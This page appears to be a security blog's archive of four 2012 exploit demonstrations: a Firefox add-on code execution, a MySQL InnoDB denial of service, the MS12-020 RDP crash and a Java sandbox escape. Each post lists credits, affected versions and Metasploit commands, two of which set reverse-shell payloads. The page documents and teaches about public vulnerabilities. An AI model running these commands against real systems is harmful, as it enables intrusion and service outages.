Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

Mozilla Firefox Bootstrapped Add-on Social Engineering Code Execution Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability found Jason Avery the 2007-06-27
Metasploit PoC provided the 2012-04-10

PoC provided by :

mihi

Reference(s) :

None

Affected version(s) :

All versions of Mozilla Firefox

Tested on Windows XP Pro SP3 with :

Mozilla Firefox 11.0

Description :

This exploit dynamically creates a .xpi add-on file. The resulting bootstrapped Firefox add-on is presented to the victim via a web page with. The victim’s Firefox browser will pop a dialog asking if they trust the add-on. Once the user clicks “install”, the add-on is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the add-on is marked to be “bootstrapped”. As the add-on will execute the payload after each Firefox restart, an option can be given to automatically uninstall the add-on once the payload has been executed.

Commands :

use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

Oracle MySQL InnoDB Bugs 13510739 and 63775 DoS Demo

Exploits, ,

Timeline :

Public release of the vulnerabilities the 2012-03-21
Details of the vulnerability published by Oracle the 2012-04-10
PoC provided by Oracle the 2012-03-21 in the source code of 5.5.22 and 5.1.62

PoC provided by :

Oracle

Reference(s) :

SA48744
MySQL 5.5.22 release note
MySQL 5.1.62 release note
Eric Romang Pastebin

Affected version(s) :

MySQL Server 5.5.21 and previous versions
MySQL Server 5.1.61 and previous versions

Tested on Centos 5 with :

MySQL 5.5.21

Description :

Oracle has release, the 21 March, two new versions of MySQL, version 5.5.22 and 5.1.62. These versions have fix two bugs #13510739 and #63775 how are considered as security fixes. But no impact details of these bugs are provided and the bugs report are closed.
Unfortunately for Oracle the two new versions were shipped with a development script “mysql-test/suite/innodb/t/innodb_bug13510739.test” in order to test the fix of the vulnerabilities, a PoC provided by Oracle. The bugs cause a denial of service of MySQL “ON HANDLER READ NEXT AFTER DELETE RECORD“. All the details are available in the script or on the upper Pastebin link.

Commands :

mysql -u root -p database < innodb_bug13510739.test

MS12-020 Microsoft Remote Desktop (RDP) DoS Metasploit Demo

Exploits, Metasploit, ,

Timeline :

Vulnerability found by Luigi Auriemma the 2011-05-16
Vulnerability reported by Luigi Auriemma to ZDI
Vulnerability reported to the vendor by ZDI the 2011-08-24
Coordinated public release of the vulnerability the 2012-03-13
Metasploit PoC provided the 2012-03-19
Details of the vulnerability published by Luigi Auriemma the 2012-05-16

PoC provided by :

Luigi Auriemma
Daniel Godas-Lopez
Alex Ionescu
jduck

Reference(s) :

CVE-2012-0002
MS12-020
ZDI-12-044
OSVDB-80004

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP2
Windows Vista x64 SP2
Windows Server 2008 32 SP2
Windows Server 2008 x64 SP2
Windows 7 for 32 and Windows 7 32 SP1
Windows 7 for x64 and Windows 7 for x64 SP1
Windows Server 2008 R2 x64 and Windows Server 2008 R2 x64 SP1

Tested on Windows XP Pro SP3

Description :

This module exploits the MS12-020 RDP vulnerability originally discovered and reported by Luigi Auriemma. The flaw can be found in the way the T.125 ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result an invalid pointer being used, therefore causing a denial-of-service condition.

Commands :

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
SET RHOST 192.168.178.22
exploit

CVE-2012-0507 Java AtomicReferenceArray Type Violation Vulnerability Metasploit Demo

Exploits, Metasploit, , , ,

Timeline :

Vulnerability found by Jeroen Frijters
Vulnerability reported to the vendor by Jeroen Frijters the 2011-08-01
Coordinated public release of the vulnerability the 2012-02-14
Details of the vulnerability published by Jeroen Frijters the 2012-02-23
Metasploit PoC provided the 2012-03-29

PoC provided by :

Jeroen Frijters
sinn3r
juan vazquez
egypt

Reference(s) :

CVE-2012-0507
OSVDB-80724
Oracle Java SE Critical Patch Update Advisory – February 2012

Affected version(s) :

Oracle Java SE 7 Update 2 and before
Oracle Java SE 6 Update 30 and before
Oracle Java SE 5.0 Update 33 and before

Tested on Windows XP Pro SP3 with :

Oracle Java SE 6 Update 16
Internet Explorer 8

Description :

This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

Commands :

use exploit/multi/browser/java_atomicreferencearray
SET SRVHOST 192.168.178.100
SET PAYLOAD generic/shell_reverse_tcp 
set LHOST 192.168.178.100
exploit